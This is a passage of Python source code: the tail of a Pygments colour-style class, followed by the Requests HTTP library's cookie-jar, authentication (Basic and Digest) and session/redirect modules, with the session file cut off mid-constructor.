FlaskyStyle(Style): background_color = "#f8f8f8" default_style = "" styles = { # No corresponding class for the following: #Text: "", # class: '' Whitespace: "underline #f8f8f8", # class: 'w' Error: "#a40000 border:#ef2929", # class: 'err' Other: "#000000", # class 'x' Comment: "italic #8f5902", # class: 'c' Comment.Preproc: "noitalic", # class: 'cp' Keyword: "bold #004461", # class: 'k' Keyword.Constant: "bold #004461", # class: 'kc' Keyword.Declaration: "bold #004461", # class: 'kd' Keyword.Namespace: "bold #004461", # class: 'kn' Keyword.Pseudo: "bold #004461", # class: 'kp' Keyword.Reserved: "bold #004461", # class: 'kr' Keyword.Type: "bold #004461", # class: 'kt' Operator: "#582800", # class: 'o' Operator.Word: "bold #004461", # class: 'ow' - like keywords Punctuation: "bold #000000", # class: 'p' # because special names such as Name.Class, Name.Function, etc. # are not recognized as such later in the parsing, we choose them # to look the same as ordinary variables. Name: "#000000", # class: 'n' Name.Attribute: "#c4a000", # class: 'na' - to be revised Name.Builtin: "#004461", # class: 'nb' Name.Builtin.Pseudo: "#3465a4", # class: 'bp' Name.Class: "#000000", # class: 'nc' - to be revised Name.Constant: "#000000", # class: 'no' - to be revised Name.Decorator: "#888", # class: 'nd' - to be revised Name.Entity: "#ce5c00", # class: 'ni' Name.Exception: "bold #cc0000", # class: 'ne' Name.Function: "#000000", # class: 'nf' Name.Property: "#000000", # class: 'py' Name.Label: "#f57900", # class: 'nl' Name.Namespace: "#000000", # class: 'nn' - to be revised Name.Other: "#000000", # class: 'nx' Name.Tag: "bold #004461", # class: 'nt' - like a keyword Name.Variable: "#000000", # class: 'nv' - to be revised Name.Variable.Class: "#000000", # class: 'vc' - to be revised Name.Variable.Global: "#000000", # class: 'vg' - to be revised Name.Variable.Instance: "#000000", # class: 'vi' - to be revised Number: "#990000", # class: 'm' Literal: "#000000", # class: 'l' Literal.Date: "#000000", # class: 'ld' String: "#4e9a06", # class: 's' String.Backtick: "#4e9a06", # class: 'sb' String.Char: "#4e9a06", # class: 'sc' String.Doc: "italic #8f5902", # class: 'sd' - like a comment String.Double: "#4e9a06", # class: 's2' String.Escape: "#4e9a06", # class: 'se' String.Heredoc: "#4e9a06", # class: 'sh' String.Interpol: "#4e9a06", # class: 'si' String.Other: "#4e9a06", # class: 'sx' String.Regex: "#4e9a06", # class: 'sr' String.Single: "#4e9a06", # class: 's1' String.Symbol: "#4e9a06", # class: 'ss' Generic: "#000000", # class: 'g' Generic.Deleted: "#a40000", # class: 'gd' Generic.Emph: "italic #000000", # class: 'ge' Generic.Error: "#ef2929", # class: 'gr' Generic.Heading: "bold #000080", # class: 'gh' Generic.Inserted: "#00A000", # class: 'gi' Generic.Output: "#888", # class: 'go' Generic.Prompt: "#745334", # class: 'gp' Generic.Strong: "bold #000000", # class: 'gs' Generic.Subheading: "bold #800080", # class: 'gu' Generic.Traceback: "bold #a40000", # class: 'gt' } File: src/requests/cookies.py """ requests.cookies ~~~~~~~~~~~~~~~~ Compatibility code to be able to use `http.cookiejar.CookieJar` with requests. requests.utils imports from here, so be careful with imports. """ import calendar import copy import time from ._internal_utils import to_native_string from .compat import Morsel, MutableMapping, cookielib, urlparse, urlunparse try: import threading except ImportError: import dummy_threading as threading class MockRequest: """Wraps a `requests.Request` to mimic a `urllib2.Request`. The code in `http.cookiejar.CookieJar` expects this interface in order to correctly manage cookie policies, i.e., determine whether a cookie can be set, given the domains of the request and the cookie. The original request object is read-only. The client is responsible for collecting the new headers via `get_new_headers()` and interpreting them appropriately. You probably want `get_cookie_header`, defined below. """ def __init__(self, request): self._r = request self._new_headers = {} self.type = urlparse(self._r.url).scheme def get_type(self): return self.type def get_host(self): return urlparse(self._r.url).netloc def get_origin_req_host(self): return self.get_host() def get_full_url(self): # Only return the response's URL if the user hadn't set the Host # header if not self._r.headers.get("Host"): return self._r.url # If they did set it, retrieve it and reconstruct the expected domain host = to_native_string(self._r.headers["Host"], encoding="utf-8") parsed = urlparse(self._r.url) # Reconstruct the URL as we expect it return urlunparse( [ parsed.scheme, host, parsed.path, parsed.params, parsed.query, parsed.fragment, ] ) def is_unverifiable(self): return True def has_header(self, name): return name in self._r.headers or name in self._new_headers def get_header(self, name, default=None): return self._r.headers.get(name, self._new_headers.get(name, default)) def add_header(self, key, val): """cookiejar has no legitimate use for this method; add it back if you find one.""" raise NotImplementedError( "Cookie headers should be added with add_unredirected_header()" ) def add_unredirected_header(self, name, value): self._new_headers[name] = value def get_new_headers(self): return self._new_headers @property def unverifiable(self): return self.is_unverifiable() @property def origin_req_host(self): return self.get_origin_req_host() @property def host(self): return self.get_host() class MockResponse: """Wraps a `httplib.HTTPMessage` to mimic a `urllib.addinfourl`. ...what? Basically, expose the parsed HTTP headers from the server response the way `http.cookiejar` expects to see them. """ def __init__(self, headers): """Make a MockResponse for `cookiejar` to read. :param headers: a httplib.HTTPMessage or analogous carrying the headers """ self._headers = headers def info(self): return self._headers def getheaders(self, name): self._headers.getheaders(name) def extract_cookies_to_jar(jar, request, response): """Extract the cookies from the response into a CookieJar. :param jar: http.cookiejar.CookieJar (not necessarily a RequestsCookieJar) :param request: our own requests.Request object :param response: urllib3.HTTPResponse object """ if not (hasattr(response, "_original_response") and response._original_response): return # the _original_response field is the wrapped httplib.HTTPResponse object, req = MockRequest(request) # pull out the HTTPMessage with the headers and put it in the mock: res = MockResponse(response._original_response.msg) jar.extract_cookies(res, req) def get_cookie_header(jar, request): """ Produce an appropriate Cookie header string to be sent with `request`, or None. :rtype: str """ r = MockRequest(request) jar.add_cookie_header(r) return r.get_new_headers().get("Cookie") def remove_cookie_by_name(cookiejar, name, domain=None, path=None): """Unsets a cookie by name, by default over all domains and paths. Wraps CookieJar.clear(), is O(n). """ clearables = [] for cookie in cookiejar: if cookie.name != name: continue if domain is not None and domain != cookie.domain: continue if path is not None and path != cookie.path: continue clearables.append((cookie.domain, cookie.path, cookie.name)) for domain, path, name in clearables: cookiejar.clear(domain, path, name) class CookieConflictError(RuntimeError): """There are two cookies that meet the criteria specified in the cookie jar. Use .get and .set and include domain and path args in order to be more specific. """ class RequestsCookieJar(cookielib.CookieJar, MutableMapping): """Compatibility class; is a http.cookiejar.CookieJar, but exposes a dict interface. This is the CookieJar we create by default for requests and sessions that don't specify one, since some clients may expect response.cookies and session.cookies to support dict operations. Requests does not use the dict interface internally; it's just for compatibility with external client code. All requests code should work out of the box with externally provided instances of ``CookieJar``, e.g. ``LWPCookieJar`` and ``FileCookieJar``. Unlike a regular CookieJar, this class is pickleable. .. warning:: dictionary operations that are normally O(1) may be O(n). """ def get(self, name, default=None, domain=None, path=None): """Dict-like get() that also supports optional domain and path args in order to resolve naming collisions from using one cookie jar over multiple domains. .. warning:: operation is O(n), not O(1). """ try: return self._find_no_duplicates(name, domain, path) except KeyError: return default def set(self, name, value, **kwargs): """Dict-like set() that also supports optional domain and path args in order to resolve naming collisions from using one cookie jar over multiple domains. """ # support client code that unsets cookies by assignment of a None value: if value is None: remove_cookie_by_name( self, name, domain=kwargs.get("domain"), path=kwargs.get("path") ) return if isinstance(value, Morsel): c = morsel_to_cookie(value) else: c = create_cookie(name, value, **kwargs) self.set_cookie(c) return c def iterkeys(self): """Dict-like iterkeys() that returns an iterator of names of cookies from the jar. .. seealso:: itervalues() and iteritems(). """ for cookie in iter(self): yield cookie.name def keys(self): """Dict-like keys() that returns a list of names of cookies from the jar. .. seealso:: values() and items(). """ return list(self.iterkeys()) def itervalues(self): """Dict-like itervalues() that returns an iterator of values of cookies from the jar. .. seealso:: iterkeys() and iteritems(). """ for cookie in iter(self): yield cookie.value def values(self): """Dict-like values() that returns a list of values of cookies from the jar. .. seealso:: keys() and items(). """ return list(self.itervalues()) def iteritems(self): """Dict-like iteritems() that returns an iterator of name-value tuples from the jar. .. seealso:: iterkeys() and itervalues(). """ for cookie in iter(self): yield cookie.name, cookie.value def items(self): """Dict-like items() that returns a list of name-value tuples from the jar. Allows client-code to call ``dict(RequestsCookieJar)`` and get a vanilla python dict of key value pairs. .. seealso:: keys() and values(). """ return list(self.iteritems()) def list_domains(self): """Utility method to list all the domains in the jar.""" domains = [] for cookie in iter(self): if cookie.domain not in domains: domains.append(cookie.domain) return domains def list_paths(self): """Utility method to list all the paths in the jar.""" paths = [] for cookie in iter(self): if cookie.path not in paths: paths.append(cookie.path) return paths def multiple_domains(self): """Returns True if there are multiple domains in the jar. Returns False otherwise. :rtype: bool """ domains = [] for cookie in iter(self): if cookie.domain is not None and cookie.domain in domains: return True domains.append(cookie.domain) return False # there is only one domain in jar def get_dict(self, domain=None, path=None): """Takes as an argument an optional domain and path and returns a plain old Python dict of name-value pairs of cookies that meet the requirements. :rtype: dict """ dictionary = {} for cookie in iter(self): if (domain is None or cookie.domain == domain) and ( path is None or cookie.path == path ): dictionary[cookie.name] = cookie.value return dictionary def __contains__(self, name): try: return super().__contains__(name) except CookieConflictError: return True def __getitem__(self, name): """Dict-like __getitem__() for compatibility with client code. Throws exception if there are more than one cookie with name. In that case, use the more explicit get() method instead. .. warning:: operation is O(n), not O(1). """ return self._find_no_duplicates(name) def __setitem__(self, name, value): """Dict-like __setitem__ for compatibility with client code. Throws exception if there is already a cookie of that name in the jar. In that case, use the more explicit set() method instead. """ self.set(name, value) def __delitem__(self, name): """Deletes a cookie given a name. Wraps ``http.cookiejar.CookieJar``'s ``remove_cookie_by_name()``. """ remove_cookie_by_name(self, name) def set_cookie(self, cookie, *args, **kwargs): if ( hasattr(cookie.value, "startswith") and cookie.value.startswith('"') and cookie.value.endswith('"') ): cookie.value = cookie.value.replace('\\"', "") return super().set_cookie(cookie, *args, **kwargs) def update(self, other): """Updates this jar with cookies from another CookieJar or dict-like""" if isinstance(other, cookielib.CookieJar): for cookie in other: self.set_cookie(copy.copy(cookie)) else: super().update(other) def _find(self, name, domain=None, path=None): """Requests uses this method internally to get cookie values. If there are conflicting cookies, _find arbitrarily chooses one. See _find_no_duplicates if you want an exception thrown if there are conflicting cookies. :param name: a string containing name of cookie :param domain: (optional) string containing domain of cookie :param path: (optional) string containing path of cookie :return: cookie.value """ for cookie in iter(self): if cookie.name == name: if domain is None or cookie.domain == domain: if path is None or cookie.path == path: return cookie.value raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}") def _find_no_duplicates(self, name, domain=None, path=None): """Both ``__get_item__`` and ``get`` call this function: it's never used elsewhere in Requests. :param name: a string containing name of cookie :param domain: (optional) string containing domain of cookie :param path: (optional) string containing path of cookie :raises KeyError: if cookie is not found :raises CookieConflictError: if there are multiple cookies that match name and optionally domain and path :return: cookie.value """ toReturn = None for cookie in iter(self): if cookie.name == name: if domain is None or cookie.domain == domain: if path is None or cookie.path == path: if toReturn is not None: # if there are multiple cookies that meet passed in criteria raise CookieConflictError( f"There are multiple cookies with name, {name!r}" ) # we will eventually return this as long as no cookie conflict toReturn = cookie.value if toReturn: return toReturn raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}") def __getstate__(self): """Unlike a normal CookieJar, this class is pickleable.""" state = self.__dict__.copy() # remove the unpickleable RLock object state.pop("_cookies_lock") return state def __setstate__(self, state): """Unlike a normal CookieJar, this class is pickleable.""" self.__dict__.update(state) if "_cookies_lock" not in self.__dict__: self._cookies_lock = threading.RLock() def copy(self): """Return a copy of this RequestsCookieJar.""" new_cj = RequestsCookieJar() new_cj.set_policy(self.get_policy()) new_cj.update(self) return new_cj def get_policy(self): """Return the CookiePolicy instance used.""" return self._policy def _copy_cookie_jar(jar): if jar is None: return None if hasattr(jar, "copy"): # We're dealing with an instance of RequestsCookieJar return jar.copy() # We're dealing with a generic CookieJar instance new_jar = copy.copy(jar) new_jar.clear() for cookie in jar: new_jar.set_cookie(copy.copy(cookie)) return new_jar def create_cookie(name, value, **kwargs): """Make a cookie from underspecified parameters. By default, the pair of `name` and `value` will be set for the domain '' and sent on every request (this is sometimes called a "supercookie"). """ result = { "version": 0, "name": name, "value": value, "port": None, "domain": "", "path": "/", "secure": False, "expires": None, "discard": True, "comment": None, "comment_url": None, "rest": {"HttpOnly": None}, "rfc2109": False, } badargs = set(kwargs) - set(result) if badargs: raise TypeError( f"create_cookie() got unexpected keyword arguments: {list(badargs)}" ) result.update(kwargs) result["port_specified"] = bool(result["port"]) result["domain_specified"] = bool(result["domain"]) result["domain_initial_dot"] = result["domain"].startswith(".") result["path_specified"] = bool(result["path"]) return cookielib.Cookie(**result) def morsel_to_cookie(morsel): """Convert a Morsel object into a Cookie containing the one k/v pair.""" expires = None if morsel["max-age"]: try: expires = int(time.time() + int(morsel["max-age"])) except ValueError: raise TypeError(f"max-age: {morsel['max-age']} must be integer") elif morsel["expires"]: time_template = "%a, %d-%b-%Y %H:%M:%S GMT" expires = calendar.timegm(time.strptime(morsel["expires"], time_template)) return create_cookie( comment=morsel["comment"], comment_url=bool(morsel["comment"]), discard=False, domain=morsel["domain"], expires=expires, name=morsel.key, path=morsel["path"], port=None, rest={"HttpOnly": morsel["httponly"]}, rfc2109=False, secure=bool(morsel["secure"]), value=morsel.value, version=morsel["version"] or 0, ) def cookiejar_from_dict(cookie_dict, cookiejar=None, overwrite=True): """Returns a CookieJar from a key/value dictionary. :param cookie_dict: Dict of key/values to insert into CookieJar. :param cookiejar: (optional) A cookiejar to add the cookies to. :param overwrite: (optional) If False, will not replace cookies already in the jar with new ones. :rtype: CookieJar """ if cookiejar is None: cookiejar = RequestsCookieJar() if cookie_dict is not None: names_from_jar = [cookie.name for cookie in cookiejar] for name in cookie_dict: if overwrite or (name not in names_from_jar): cookiejar.set_cookie(create_cookie(name, cookie_dict[name])) return cookiejar def merge_cookies(cookiejar, cookies): """Add cookies to cookiejar and returns a merged CookieJar. :param cookiejar: CookieJar object to add the cookies to. :param cookies: Dictionary or CookieJar object to be added. :rtype: CookieJar """ if not isinstance(cookiejar, cookielib.CookieJar): raise ValueError("You can only merge into CookieJar") if isinstance(cookies, dict): cookiejar = cookiejar_from_dict(cookies, cookiejar=cookiejar, overwrite=False) elif isinstance(cookies, cookielib.CookieJar): try: cookiejar.update(cookies) except AttributeError: for cookie_in_jar in cookies: cookiejar.set_cookie(cookie_in_jar) return cookiejar File: src/requests/auth.py """ requests.auth ~~~~~~~~~~~~~ This module contains the authentication handlers for Requests. """ import hashlib import os import re import threading import time import warnings from base64 import b64encode from ._internal_utils import to_native_string from .compat import basestring, str, urlparse from .cookies import extract_cookies_to_jar from .utils import parse_dict_header CONTENT_TYPE_FORM_URLENCODED = "application/x-www-form-urlencoded" CONTENT_TYPE_MULTI_PART = "multipart/form-data" def _basic_auth_str(username, password): """Returns a Basic Auth string.""" # "I want us to put a big-ol' comment on top of it that # says that this behaviour is dumb but we need to preserve # it because people are relying on it." # - Lukasa # # These are here solely to maintain backwards compatibility # for things like ints. This will be removed in 3.0.0. if not isinstance(username, basestring): warnings.warn( "Non-string usernames will no longer be supported in Requests " "3.0.0. Please convert the object you've passed in ({!r}) to " "a string or bytes object in the near future to avoid " "problems.".format(username), category=DeprecationWarning, ) username = str(username) if not isinstance(password, basestring): warnings.warn( "Non-string passwords will no longer be supported in Requests " "3.0.0. Please convert the object you've passed in ({!r}) to " "a string or bytes object in the near future to avoid " "problems.".format(type(password)), category=DeprecationWarning, ) password = str(password) # -- End Removal -- if isinstance(username, str): username = username.encode("latin1") if isinstance(password, str): password = password.encode("latin1") authstr = "Basic " + to_native_string( b64encode(b":".join((username, password))).strip() ) return authstr class AuthBase: """Base class that all auth implementations derive from""" def __call__(self, r): raise NotImplementedError("Auth hooks must be callable.") class HTTPBasicAuth(AuthBase): """Attaches HTTP Basic Authentication to the given Request object.""" def __init__(self, username, password): self.username = username self.password = password def __eq__(self, other): return all( [ self.username == getattr(other, "username", None), self.password == getattr(other, "password", None), ] ) def __ne__(self, other): return not self == other def __call__(self, r): r.headers["Authorization"] = _basic_auth_str(self.username, self.password) return r class HTTPProxyAuth(HTTPBasicAuth): """Attaches HTTP Proxy Authentication to a given Request object.""" def __call__(self, r): r.headers["Proxy-Authorization"] = _basic_auth_str(self.username, self.password) return r class HTTPDigestAuth(AuthBase): """Attaches HTTP Digest Authentication to the given Request object.""" def __init__(self, username, password): self.username = username self.password = password # Keep state in per-thread local storage self._thread_local = threading.local() def init_per_thread_state(self): # Ensure state is initialized just once per-thread if not hasattr(self._thread_local, "init"): self._thread_local.init = True self._thread_local.last_nonce = "" self._thread_local.nonce_count = 0 self._thread_local.chal = {} self._thread_local.pos = None self._thread_local.num_401_calls = None def build_digest_header(self, method, url): """ :rtype: str """ realm = self._thread_local.chal["realm"] nonce = self._thread_local.chal["nonce"] qop = self._thread_local.chal.get("qop") algorithm = self._thread_local.chal.get("algorithm") opaque = self._thread_local.chal.get("opaque") hash_utf8 = None if algorithm is None: _algorithm = "MD5" else: _algorithm = algorithm.upper() # lambdas assume digest modules are imported at the top level if _algorithm == "MD5" or _algorithm == "MD5-SESS": def md5_utf8(x): if isinstance(x, str): x = x.encode("utf-8") return hashlib.md5(x).hexdigest() hash_utf8 = md5_utf8 elif _algorithm == "SHA": def sha_utf8(x): if isinstance(x, str): x = x.encode("utf-8") return hashlib.sha1(x).hexdigest() hash_utf8 = sha_utf8 elif _algorithm == "SHA-256": def sha256_utf8(x): if isinstance(x, str): x = x.encode("utf-8") return hashlib.sha256(x).hexdigest() hash_utf8 = sha256_utf8 elif _algorithm == "SHA-512": def sha512_utf8(x): if isinstance(x, str): x = x.encode("utf-8") return hashlib.sha512(x).hexdigest() hash_utf8 = sha512_utf8 KD = lambda s, d: hash_utf8(f"{s}:{d}") # noqa:E731 if hash_utf8 is None: return None # XXX not implemented yet entdig = None p_parsed = urlparse(url) #: path is request-uri defined in RFC 2616 which should not be empty path = p_parsed.path or "/" if p_parsed.query: path += f"?{p_parsed.query}" A1 = f"{self.username}:{realm}:{self.password}" A2 = f"{method}:{path}" HA1 = hash_utf8(A1) HA2 = hash_utf8(A2) if nonce == self._thread_local.last_nonce: self._thread_local.nonce_count += 1 else: self._thread_local.nonce_count = 1 ncvalue = f"{self._thread_local.nonce_count:08x}" s = str(self._thread_local.nonce_count).encode("utf-8") s += nonce.encode("utf-8") s += time.ctime().encode("utf-8") s += os.urandom(8) cnonce = hashlib.sha1(s).hexdigest()[:16] if _algorithm == "MD5-SESS": HA1 = hash_utf8(f"{HA1}:{nonce}:{cnonce}") if not qop: respdig = KD(HA1, f"{nonce}:{HA2}") elif qop == "auth" or "auth" in qop.split(","): noncebit = f"{nonce}:{ncvalue}:{cnonce}:auth:{HA2}" respdig = KD(HA1, noncebit) else: # XXX handle auth-int. return None self._thread_local.last_nonce = nonce # XXX should the partial digests be encoded too? base = ( f'username="{self.username}", realm="{realm}", nonce="{nonce}", ' f'uri="{path}", response="{respdig}"' ) if opaque: base += f', opaque="{opaque}"' if algorithm: base += f', algorithm="{algorithm}"' if entdig: base += f', digest="{entdig}"' if qop: base += f', qop="auth", nc={ncvalue}, cnonce="{cnonce}"' return f"Digest {base}" def handle_redirect(self, r, **kwargs): """Reset num_401_calls counter on redirects.""" if r.is_redirect: self._thread_local.num_401_calls = 1 def handle_401(self, r, **kwargs): """ Takes the given response and tries digest-auth, if needed. :rtype: requests.Response """ # If response is not 4xx, do not auth # See https://github.com/psf/requests/issues/3772 if not 400 <= r.status_code < 500: self._thread_local.num_401_calls = 1 return r if self._thread_local.pos is not None: # Rewind the file position indicator of the body to where # it was to resend the request. r.request.body.seek(self._thread_local.pos) s_auth = r.headers.get("www-authenticate", "") if "digest" in s_auth.lower() and self._thread_local.num_401_calls < 2: self._thread_local.num_401_calls += 1 pat = re.compile(r"digest ", flags=re.IGNORECASE) self._thread_local.chal = parse_dict_header(pat.sub("", s_auth, count=1)) # Consume content and release the original connection # to allow our new request to reuse the same one. r.content r.close() prep = r.request.copy() extract_cookies_to_jar(prep._cookies, r.request, r.raw) prep.prepare_cookies(prep._cookies) prep.headers["Authorization"] = self.build_digest_header( prep.method, prep.url ) _r = r.connection.send(prep, **kwargs) _r.history.append(r) _r.request = prep return _r self._thread_local.num_401_calls = 1 return r def __call__(self, r): # Initialize per-thread state, if needed self.init_per_thread_state() # If we have a saved nonce, skip the 401 if self._thread_local.last_nonce: r.headers["Authorization"] = self.build_digest_header(r.method, r.url) try: self._thread_local.pos = r.body.tell() except AttributeError: # In the case of HTTPDigestAuth being reused and the body of # the previous request was a file-like object, pos has the # file position of the previous body. Ensure it's set to # None. self._thread_local.pos = None r.register_hook("response", self.handle_401) r.register_hook("response", self.handle_redirect) self._thread_local.num_401_calls = 1 return r def __eq__(self, other): return all( [ self.username == getattr(other, "username", None), self.password == getattr(other, "password", None), ] ) def __ne__(self, other): return not self == other File: src/requests/sessions.py """ requests.sessions ~~~~~~~~~~~~~~~~~ This module provides a Session object to manage and persist settings across requests (cookies, auth, proxies). """ import os import sys import time from collections import OrderedDict from datetime import timedelta from ._internal_utils import to_native_string from .adapters import HTTPAdapter from .auth import _basic_auth_str from .compat import Mapping, cookielib, urljoin, urlparse from .cookies import ( RequestsCookieJar, cookiejar_from_dict, extract_cookies_to_jar, merge_cookies, ) from .exceptions import ( ChunkedEncodingError, ContentDecodingError, InvalidSchema, TooManyRedirects, ) from .hooks import default_hooks, dispatch_hook # formerly defined here, reexposed here for backward compatibility from .models import ( # noqa: F401 DEFAULT_REDIRECT_LIMIT, REDIRECT_STATI, PreparedRequest, Request, ) from .status_codes import codes from .structures import CaseInsensitiveDict from .utils import ( # noqa: F401 DEFAULT_PORTS, default_headers, get_auth_from_url, get_environ_proxies, get_netrc_auth, requote_uri, resolve_proxies, rewind_body, should_bypass_proxies, to_key_val_list, ) # Preferred clock, based on which one is more accurate on a given system. if sys.platform == "win32": preferred_clock = time.perf_counter else: preferred_clock = time.time def merge_setting(request_setting, session_setting, dict_class=OrderedDict): """Determines appropriate setting for a given request, taking into account the explicit setting on that request, and the setting in the session. If a setting is a dictionary, they will be merged together using `dict_class` """ if session_setting is None: return request_setting if request_setting is None: return session_setting # Bypass if not a dictionary (e.g. verify) if not ( isinstance(session_setting, Mapping) and isinstance(request_setting, Mapping) ): return request_setting merged_setting = dict_class(to_key_val_list(session_setting)) merged_setting.update(to_key_val_list(request_setting)) # Remove keys that are set to None. Extract keys first to avoid altering # the dictionary during iteration. none_keys = [k for (k, v) in merged_setting.items() if v is None] for key in none_keys: del merged_setting[key] return merged_setting def merge_hooks(request_hooks, session_hooks, dict_class=OrderedDict): """Properly merges both requests and session hooks. This is necessary because when request_hooks == {'response': []}, the merge breaks Session hooks entirely. """ if session_hooks is None or session_hooks.get("response") == []: return request_hooks if request_hooks is None or request_hooks.get("response") == []: return session_hooks return merge_setting(request_hooks, session_hooks, dict_class) class SessionRedirectMixin: def get_redirect_target(self, resp): """Receives a Response. Returns a redirect URI or ``None``""" # Due to the nature of how requests processes redirects this method will # be called at least once upon the original response and at least twice # on each subsequent redirect response (if any). # If a custom mixin is used to handle this logic, it may be advantageous # to cache the redirect location onto the response object as a private # attribute. if resp.is_redirect: location = resp.headers["location"] # Currently the underlying http module on py3 decode headers # in latin1, but empirical evidence suggests that latin1 is very # rarely used with non-ASCII characters in HTTP headers. # It is more likely to get UTF8 header rather than latin1. # This causes incorrect handling of UTF8 encoded location headers. # To solve this, we re-encode the location in latin1. location = location.encode("latin1") return to_native_string(location, "utf8") return None def should_strip_auth(self, old_url, new_url): """Decide whether Authorization header should be removed when redirecting""" old_parsed = urlparse(old_url) new_parsed = urlparse(new_url) if old_parsed.hostname != new_parsed.hostname: return True # Special case: allow http -> https redirect when using the standard # ports. This isn't specified by RFC 7235, but is kept to avoid # breaking backwards compatibility with older versions of requests # that allowed any redirects on the same host. if ( old_parsed.scheme == "http" and old_parsed.port in (80, None) and new_parsed.scheme == "https" and new_parsed.port in (443, None) ): return False # Handle default port usage corresponding to scheme. changed_port = old_parsed.port != new_parsed.port changed_scheme = old_parsed.scheme != new_parsed.scheme default_port = (DEFAULT_PORTS.get(old_parsed.scheme, None), None) if ( not changed_scheme and old_parsed.port in default_port and new_parsed.port in default_port ): return False # Standard case: root URI must match return changed_port or changed_scheme def resolve_redirects( self, resp, req, stream=False, timeout=None, verify=True, cert=None, proxies=None, yield_requests=False, **adapter_kwargs, ): """Receives a Response. Returns a generator of Responses or Requests.""" hist = [] # keep track of history url = self.get_redirect_target(resp) previous_fragment = urlparse(req.url).fragment while url: prepared_request = req.copy() # Update history and keep track of redirects. # resp.history must ignore the original request in this loop hist.append(resp) resp.history = hist[1:] try: resp.content # Consume socket so it can be released except (ChunkedEncodingError, ContentDecodingError, RuntimeError): resp.raw.read(decode_content=False) if len(resp.history) >= self.max_redirects: raise TooManyRedirects( f"Exceeded {self.max_redirects} redirects.", response=resp ) # Release the connection back into the pool. resp.close() # Handle redirection without scheme (see: RFC 1808 Section 4) if url.startswith("//"): parsed_rurl = urlparse(resp.url) url = ":".join([to_native_string(parsed_rurl.scheme), url]) # Normalize url case and attach previous fragment if needed (RFC 7231 7.1.2) parsed = urlparse(url) if parsed.fragment == "" and previous_fragment: parsed = parsed._replace(fragment=previous_fragment) elif parsed.fragment: previous_fragment = parsed.fragment url = parsed.geturl() # Facilitate relative 'location' headers, as allowed by RFC 7231. # (e.g. '/path/to/resource' instead of 'http://domain.tld/path/to/resource') # Compliant with RFC3986, we percent encode the url. if not parsed.netloc: url = urljoin(resp.url, requote_uri(url)) else: url = requote_uri(url) prepared_request.url = to_native_string(url) self.rebuild_method(prepared_request, resp) # https://github.com/psf/requests/issues/1084 if resp.status_code not in ( codes.temporary_redirect, codes.permanent_redirect, ): # https://github.com/psf/requests/issues/3490 purged_headers = ("Content-Length", "Content-Type", "Transfer-Encoding") for header in purged_headers: prepared_request.headers.pop(header, None) prepared_request.body = None headers = prepared_request.headers headers.pop("Cookie", None) # Extract any cookies sent on the response to the cookiejar # in the new request. Because we've mutated our copied prepared # request, use the old one that we haven't yet touched. extract_cookies_to_jar(prepared_request._cookies, req, resp.raw) merge_cookies(prepared_request._cookies, self.cookies) prepared_request.prepare_cookies(prepared_request._cookies) # Rebuild auth and proxy information. proxies = self.rebuild_proxies(prepared_request, proxies) self.rebuild_auth(prepared_request, resp) # A failed tell() sets `_body_position` to `object()`. This non-None # value ensures `rewindable` will be True, allowing us to raise an # UnrewindableBodyError, instead of hanging the connection. rewindable = prepared_request._body_position is not None and ( "Content-Length" in headers or "Transfer-Encoding" in headers ) # Attempt to rewind consumed file-like object. if rewindable: rewind_body(prepared_request) # Override the original request. req = prepared_request if yield_requests: yield req else: resp = self.send( req, stream=stream, timeout=timeout, verify=verify, cert=cert, proxies=proxies, allow_redirects=False, **adapter_kwargs, ) extract_cookies_to_jar(self.cookies, prepared_request, resp.raw) # extract redirect url, if any, for the next loop url = self.get_redirect_target(resp) yield resp def rebuild_auth(self, prepared_request, response): """When being redirected we may want to strip authentication from the request to avoid leaking credentials. This method intelligently removes and reapplies authentication where possible to avoid credential loss. """ headers = prepared_request.headers url = prepared_request.url if "Authorization" in headers and self.should_strip_auth( response.request.url, url ): # If we get redirected to a new host, we should strip out any # authentication headers. del headers["Authorization"] # .netrc might have more auth for us on our new host. new_auth = get_netrc_auth(url) if self.trust_env else None if new_auth is not None: prepared_request.prepare_auth(new_auth) def rebuild_proxies(self, prepared_request, proxies): """This method re-evaluates the proxy configuration by considering the environment variables. If we are redirected to a URL covered by NO_PROXY, we strip the proxy configuration. Otherwise, we set missing proxy keys for this URL (in case they were stripped by a previous redirect). This method also replaces the Proxy-Authorization header where necessary. :rtype: dict """ headers = prepared_request.headers scheme = urlparse(prepared_request.url).scheme new_proxies = resolve_proxies(prepared_request, proxies, self.trust_env) if "Proxy-Authorization" in headers: del headers["Proxy-Authorization"] try: username, password = get_auth_from_url(new_proxies[scheme]) except KeyError: username, password = None, None # urllib3 handles proxy authorization for us in the standard adapter. # Avoid appending this to TLS tunneled requests where it may be leaked. if not scheme.startswith("https") and username and password: headers["Proxy-Authorization"] = _basic_auth_str(username, password) return new_proxies def rebuild_method(self, prepared_request, response): """When being redirected we may want to change the method of the request based on certain specs or browser behavior. """ method = prepared_request.method # https://tools.ietf.org/html/rfc7231#section-6.4.4 if response.status_code == codes.see_other and method != "HEAD": method = "GET" # Do what the browsers do, despite standards... # First, turn 302s into GETs. if response.status_code == codes.found and method != "HEAD": method = "GET" # Second, if a POST is responded to with a 301, turn it into a GET. # This bizarre behaviour is explained in Issue 1704. if response.status_code == codes.moved and method == "POST": method = "GET" prepared_request.method = method class Session(SessionRedirectMixin): """A Requests session. Provides cookie persistence, connection-pooling, and configuration. Basic Usage:: >>> import requests >>> s = requests.Session() >>> s.get('https://httpbin.org/get') <Response [200]> Or as a context manager:: >>> with requests.Session() as s: ... s.get('https://httpbin.org/get') <Response [200]> """ __attrs__ = [ "headers", "cookies", "auth", "proxies", "hooks", "params", "verify", "cert", "adapters", "stream", "trust_env", "max_redirects", ] def __init__(self): #: A case-insensitive dictionary of headers to be sent on each #: :class:`Request <Request>` sent from this #: :class:`Session <Session>`. self.headers = default_headers() #: Default Authentication tuple or object to attach to #: :class:`Request <Request>`. self.auth = None #: Dictionary mapping protocol or protocol and host to the URL of the proxy #: (e.g. {'http': 'foo.bar:3128', 'http://host.name': 'foo.bar:4012'}) to #: be used on each :class:`Request <Request>`. self.proxies = {} #: Event-handling hooks. self.hooks = default_hooks() #: Dictionary of querystring data to attach to each #: :class:`Request <Request>`. The dictionary values may be lists for #: representing multivalued query parameters. self.params = {} #: Stream response content default. self.stream = False #: SSL Verification default. #: Defaults to `True`, requiring requests to verify the TLS certificate at the #: remote end. #: If verify is set to `False`, requests will accept any TLS certificate #: presented by the server, and will ignore hostname mismatches and/or #: expired certificates, which will make your application vulnerable to #: man-in-the-middle (MitM) attacks. #: Only set this to `False` for testing. self.verify = True #: SSL client 